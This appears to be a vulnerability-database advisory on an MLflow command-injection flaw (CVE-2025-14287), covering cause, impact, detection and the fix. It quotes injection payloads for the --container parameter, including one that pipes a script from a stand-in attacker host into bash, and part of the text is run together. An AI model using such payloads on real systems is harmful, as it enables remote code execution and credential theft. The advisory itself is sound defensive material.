
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-14287 is a command injection vulnerability in MLflow (mlflow/mlflow) versions before v3.7.0, specifically in the mlflow/sagemaker/__init__.py file (lines 161–167). User-supplied container image names are directly interpolated into shell commands without sanitization and executed via os.system(), enabling arbitrary OS command execution through the --container CLI parameter. The vulnerability was disclosed on March 15–16, 2026, and affects development environments, CI/CD pipelines, and cloud deployments using MLflow. It carries a CVSS v3.1 base score of 8.8 (High) (Red Hat Advisory, Red Hat Bugzilla).
The root cause is improper neutralization of special elements in an OS command (CWE-78) and improper control of code generation (CWE-94). In mlflow/sagemaker/__init__.py at lines 161–167, the application constructs shell command strings by directly embedding the user-controlled --container parameter value without any input validation or escaping, then passes the resulting string to os.system(). An attacker can inject shell metacharacters (e.g., ;, &&, |, backticks) into the container image name to append or substitute arbitrary commands. Exploitation requires user interaction — specifically, a user must execute the MLflow CLI with the attacker-controlled --container argument, which could occur in automated CI/CD pipelines processing untrusted input (Red Hat Bugzilla, Huntr Bounty).
Successful exploitation allows an attacker to execute arbitrary operating system commands with the privileges of the MLflow process, resulting in high confidentiality, integrity, and availability impact. This can lead to full system compromise, data exfiltration, credential theft, or disruption of ML workflows in affected environments. The vulnerability is particularly dangerous in CI/CD pipelines and cloud deployments (e.g., AWS SageMaker integrations) where MLflow processes may run with elevated permissions or have access to sensitive infrastructure (Red Hat Advisory, Red Hat Bugzilla).
No confirmed in-the-wild exploitation has been observed, and no weaponized exploit code is publicly available as of the time of reporting. A bounty report exists on Huntr (the vulnerability disclosure platform), but the associated page content was found to be non-exploitable upon analysis (Huntr Bounty). The EPSS score is approximately 0.071% (very low probability of exploitation in the near term). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been reported.
legitimate-image:latest; curl http://attacker.com/shell.sh | bash or legitimate-image:latest && id > /tmp/pwned.--container parameter to the MLflow CLI command, e.g., mlflow sagemaker deploy --container 'legitimate-image:latest; <malicious_command>'. In a CI/CD context, this could be achieved by manipulating pipeline configuration files, environment variables, or upstream inputs that feed into the MLflow CLI invocation.os.system(), executing the injected payload with the privileges of the MLflow process./bin/sh, bash, curl, wget, python) with unusual arguments or network connections.--container parameter values containing shell metacharacters (;, &&, ||, |, backticks, $()) in application or shell history logs./tmp/) by the MLflow process; new scripts, binaries, or cron jobs created under the MLflow service account.The primary remediation is to upgrade MLflow to version v3.7.0 or later, which addresses the unsanitized interpolation of container image names in the SageMaker module (Red Hat Advisory, Red Hat Bugzilla). As interim workarounds: restrict CLI access to trusted users only; implement strict input validation on container image names (allowlist of valid image name characters); avoid passing untrusted or user-controlled values to the --container parameter; and consider running MLflow processes in sandboxed or containerized environments with minimal privileges to limit the blast radius of any command execution.
The vulnerability was reported through the Huntr bug bounty platform and assigned by @huntr_ai. Red Hat tracked it via their security response process (Bugzilla Bug 2447690) with a high severity rating. A brief technical write-up was published at infinitsec.net shortly after disclosure. Social media activity was limited, with automated CVE tracking posts appearing on Bluesky. No major vendor statements or significant researcher commentary beyond the initial disclosure have been identified.
Fix availability across major Linux distributions and their releases.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."